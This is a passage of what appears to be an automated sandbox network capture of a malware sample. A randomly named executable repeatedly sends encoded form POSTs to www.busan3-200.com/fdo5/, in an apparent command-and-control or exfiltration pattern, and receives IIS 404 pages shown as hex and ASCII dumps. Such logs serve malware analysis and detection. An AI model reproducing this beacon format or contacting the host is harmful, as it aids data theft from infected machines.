2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-
                                                                                              Dec 3, 2023 16:26:53.129312992 CET1340INData Raw: 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33
                                                                                              Data Ascii: 23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5
                                                                                              Dec 3, 2023 16:26:53.129327059 CET1340INData Raw: 39 20 32 2e 30 33 20 31 2e 33 32 20 33 2e 37 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31
                                                                                              Data Ascii: 9 2.03 1.32 3.75 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"
                                                                                              Dec 3, 2023 16:26:53.129342079 CET1340INData Raw: 31 39 20 31 35 2e 32 37 20 33 2e 31 39 20 32 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36
                                                                                              Data Ascii: 19 15.27 3.19 23.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.0
                                                                                              Dec 3, 2023 16:26:53.129359007 CET348INData Raw: 75 73 73 69 61 6e 62 6c 75 72 20 63 6c 61 73 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20
                                                                                              Data Ascii: ussianblur class="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              13192.168.2.44975352.68.224.126802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:26:58.539813042 CET724OUTPOST /fdo5/ HTTP/1.1
                                                                                              Host: www.busan3-200.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.busan3-200.com
                                                                                              Referer: http://www.busan3-200.com/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 35 34 30 48 32 78 3d 6c 37 59 79 70 6c 6e 31 6a 34 5a 52 77 4d 35 65 6b 6a 6d 64 73 4b 33 62 79 46 74 4d 70 32 47 30 51 52 67 4d 6c 73 50 51 46 4c 36 41 42 32 50 45 2b 4b 4d 34 39 48 72 73 53 47 4f 55 78 63 75 49 32 63 49 58 4b 51 33 75 37 73 77 6d 51 79 76 55 44 7a 64 64 78 42 43 63 56 78 39 67 48 36 62 37 42 4b 42 49 57 57 6f 42 79 79 58 35 4c 42 79 45 52 46 35 52 74 7a 52 47 6b 70 61 71 4b 56 31 42 2f 64 6f 44 54 63 73 48 62 55 71 51 43 67 76 58 69 59 48 2f 76 6a 52 4d 2f 53 72 37 67 45 46 36 4a 55 41 46 59 44 46 44 78 41 64 54 67 45 4d 4d 47 41 3d 3d
                                                                                              Data Ascii: 540H2x=l7Yypln1j4ZRwM5ekjmdsK3byFtMp2G0QRgMlsPQFL6AB2PE+KM49HrsSGOUxcuI2cIXKQ3u7swmQyvUDzddxBCcVx9gH6b7BKBIWWoByyX5LByERF5RtzRGkpaqKV1B/doDTcsHbUqQCgvXiYH/vjRM/Sr7gEF6JUAFYDFDxAdTgEMMGA==
                                                                                              Dec 3, 2023 16:26:58.811713934 CET1340INHTTP/1.1 404 Not Found
                                                                                              Cache-Control: private
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Server: Microsoft-IIS/8.5
                                                                                              X-Powered-By: ASP.NET
                                                                                              Date: Sun, 03 Dec 2023 15:26:58 GMT
                                                                                              Connection: close
                                                                                              Content-Length: 4857
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;co
                                                                                              Dec 3, 2023 16:26:58.811739922 CET1340INData Raw: 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a
                                                                                              Data Ascii: lor:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;
                                                                                              Dec 3, 2023 16:26:58.811755896 CET1340INData Raw: 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e
                                                                                              Data Ascii: ;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is
                                                                                              Dec 3, 2023 16:26:58.811773062 CET1271INData Raw: 3b 49 49 53 20 57 65 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71
                                                                                              Data Ascii: ;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x8007000


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              14192.168.2.44975452.68.224.126802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:27:01.337733030 CET744OUTPOST /fdo5/ HTTP/1.1
                                                                                              Host: www.busan3-200.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.busan3-200.com
                                                                                              Referer: http://www.busan3-200.com/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 207
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 35 34 30 48 32 78 3d 6c 37 59 79 70 6c 6e 31 6a 34 5a 52 69 38 4a 65 68 45 79 64 71 71 33 59 78 46 74 4d 67 57 47 77 51 52 6b 4d 6c 74 4c 41 47 35 75 41 42 57 66 45 39 4c 4d 34 77 6e 72 73 5a 6d 4f 52 31 63 75 44 32 63 45 35 4b 51 62 75 37 73 55 6d 51 79 2f 55 44 41 31 53 78 52 44 36 63 52 39 69 59 4b 62 37 42 4b 42 49 57 53 34 6e 79 79 66 35 49 77 43 45 58 67 4e 57 67 54 52 46 30 35 61 71 63 6c 30 49 2f 64 6f 31 54 64 78 50 62 52 32 51 43 6c 72 58 68 4e 72 2b 32 54 51 4a 37 53 71 48 78 78 59 49 64 6c 52 62 53 68 6c 56 78 58 30 6b 68 52 67 66 42 36 69 51 70 75 6f 39 44 48 53 56 68 78 6b 37 79 41 55 78 30 31 41 3d
                                                                                              Data Ascii: 540H2x=l7Yypln1j4ZRi8JehEydqq3YxFtMgWGwQRkMltLAG5uABWfE9LM4wnrsZmOR1cuD2cE5KQbu7sUmQy/UDA1SxRD6cR9iYKb7BKBIWS4nyyf5IwCEXgNWgTRF05aqcl0I/do1TdxPbR2QClrXhNr+2TQJ7SqHxxYIdlRbShlVxX0khRgfB6iQpuo9DHSVhxk7yAUx01A=
                                                                                              Dec 3, 2023 16:27:01.607656002 CET1340INHTTP/1.1 404 Not Found
                                                                                              Cache-Control: private
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Server: Microsoft-IIS/8.5
                                                                                              X-Powered-By: ASP.NET
                                                                                              Date: Sun, 03 Dec 2023 15:27:01 GMT
                                                                                              Connection: close
                                                                                              Content-Length: 4857
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;co
                                                                                              Dec 3, 2023 16:27:01.607826948 CET1340INData Raw: 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a
                                                                                              Data Ascii: lor:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;
                                                                                              Dec 3, 2023 16:27:01.607875109 CET1340INData Raw: 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e
                                                                                              Data Ascii: ;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is
                                                                                              Dec 3, 2023 16:27:01.607891083 CET1271INData Raw: 3b 49 49 53 20 57 65 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71
                                                                                              Data Ascii: ;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x8007000


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              15192.168.2.44975552.68.224.126802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:27:04.133094072 CET7770OUTPOST /fdo5/ HTTP/1.1
                                                                                              Host: www.busan3-200.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.busan3-200.com
                                                                                              Referer: http://www.busan3-200.com/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 10287
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
